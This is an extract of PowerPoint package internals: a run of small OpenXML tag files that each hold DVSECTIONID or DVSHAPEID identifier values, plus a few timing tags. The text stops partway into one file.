<file path=ppt/tags/tag170.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="lbNXzTEQYlYi1f4HknH4OQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag171.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="3mdOeOlgHiZfEZi9tbX2u7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag172.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="3mdOeOlgHiZfEZi9tbX2u7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag173.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="hGO4EfG8qOqv8rKKEPvIEF"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag174.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="iLB4oaTw6LlW4w09a5zyRa"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag175.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="O9RRpJw7xMsBn2tzQveTHE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag176.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="9cmdKuFp96N8WsdxLaZZey"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag177.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ts9XGBe3jXsaZFubY2s7Cm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag178.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Of60mjK4UIqAIT4NN3a6MP"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag179.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="FMtx3AcWw6W6ETQFfVjf3K"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="m8LQ0RNyeOUgm4dmg727FX"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag180.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="JoWA7aepXwAYAkxOf9SXcj"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag181.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ECeaW7OfNxMU25Ast1I79p"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag182.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="wGjw8qF9n6yqJklWd6AHJ2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag183.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="bFhrdMGQf49f6yRqZnzDaG"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag184.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="mCmg7wNBwsFtuDeGdSswQt"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag185.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="gteN4N7d85SviF5WF92EyH"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag186.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="uxXQT1QY38SretfPbHcU4w"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag187.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="h8MS2gBQXCEpWuSDu3vXPz"/>
  <p:tag name="TIMING" val="|0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag188.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="h8MS2gBQXCEpWuSDu3vXPz"/>
  <p:tag name="TIMING" val="|0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag189.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="h8MS2gBQXCEpWuSDu3vXPz"/>
  <p:tag name="TIMING" val="|0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Ot2EGYrDYvMNeOse3jW8eg"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag190.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="zxRbVOZu8Zl44fuOYbbNt5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Eo2HWuJV9V0smEon833pS8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="KjTHnLPpJTtpjhOmaO7APo"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="uzPoT13JbwJyJILYBGNzMS"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jPuaqH871DqlPjSYRNl0IW"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="FLy5AbdqNgCBf0UJBmA3u6"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="8nSs6CO0dMam9JBk6XUBQ9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Je3R47cZpEszDac84BBM3Q"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rTRa7ggC9TgYEEpfxHOdmv"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Uz6r8XTiZ36SNaZT0VJNvz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jFvyJO4UYPuVYh4G8iJQUc"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="FaDbSJvOQYWtWxGbyfln2P"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Gqvo4Ium2FZAvgeaSXL2Av"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="XdmHq0BQ1hpzXQZzFl9NZa"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag31.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="DT3wRDPQI7iQcqObivc0XF"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag32.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="4mzPbYz0efPNzsEU8Y1bzh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag33.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="h7EzKt2EAZdYPGW2rQgHT3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag34.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="1oQmxoneZL6N5saCe5YAEQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ABDXY5xaURne6gJoWDgm0r"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag36.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="S2BtRPCaIjobNfIzphGORe"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="pRmUTP9kjiP9IBlueIyK93"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="PVstFmeZFbADCK7WVM1n06"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="lEw7eV3Yf65l1rspaM6kCE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="8tY7C9JbeBmvHCbxp1qMTk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="z4ZAniMMJL3JzNWx8jWGWt"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag41.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ygJGtwBehFtG5s8EyLctmk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="hhREtCENoVH5wIQHOgavto"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="fTIuptKbut6eYrOP3ZAuhy"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="YZVqNQWWiRQT1YWYca2dre"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="YhJpSYcbVZ7HUIyZGTeyaf"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="o5pQS4Mpr36K1EGnYXJ7WQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag47.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Mk4dpdt8ZS4JTEZ268ovx3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag48.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="A9HUjiVgO3ixj5MFEzWj4d"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag49.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="GhL2oWRBIriIJUwvUadJ40"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="tM879Xa5DQyah1pW5lDQqn"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rllUgrtPzeZmtp9hUZodlQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag51.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="eAmR89EL5l9FQpGuGq7SR3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag52.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Jmq6mDfekQFA6KxoijaO8D"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dNzJAqiX5sYaQ0q1N1vR0j"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag54.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="0giWWh8NI3U59CxC3PVnKd"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag55.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BWTxXgw8ihDTNirDu1PiJV"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag56.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="fLQOtaYFWDyNEm2okRhzLD"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag57.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rfPebplUxstGG8G9MlaCk0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag58.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="l0E4A5GY0a9CjBYfZzk255"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jYGUHa4Vo8jrTPA6Ofdzri"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dZyBZkxJBNCN0cZvZL09Xw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="w3O5axlBhiUfGFoGnvT5L1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag61.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jSH9ETK5OwD1sC6C0wzNQ0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag62.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="wE9VI8RHFmxuKWn0TsQcto"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BFdLAKvmvXail30JaCd7Qh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag64.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="tXR9fZD7XEx72tHWx6cjRz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag65.xml><?xml version="1.0" encoding="utf-8"?>
